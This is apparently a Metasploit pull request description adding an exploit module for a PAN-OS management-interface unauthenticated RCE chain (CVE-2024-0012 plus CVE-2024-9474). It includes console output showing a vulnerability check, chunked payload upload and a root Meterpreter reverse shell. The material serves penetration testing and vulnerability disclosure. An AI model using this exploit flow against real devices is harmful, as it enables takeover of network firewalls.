Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474)

[sfewer-r7]

This pull request adds an exploit module for the recent PAN-OS management interface unauthenticated RCE exploit chain (CVE-2024-0012 + CVE-2024-9474), based upon the technical analysis published by watchTowr.

The exploit module has been tested against PAN-OS 10.2.8 and 11.1.4.

Example

msf6 exploit(linux/http/panos_management_unauth_rce) > check
[+] 192.168.86.100:443 - The target is vulnerable.
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:52828) at 2024-11-19 16:09:19 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.100
OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[sfewer-r7]

Note, commit de599a4 fixes a bug in how the individual chunk files are ensured to be sequential, and introduces a max payload size of 5670 chars, as we now need to decrement the chunk size by 1 character every 9 chunks.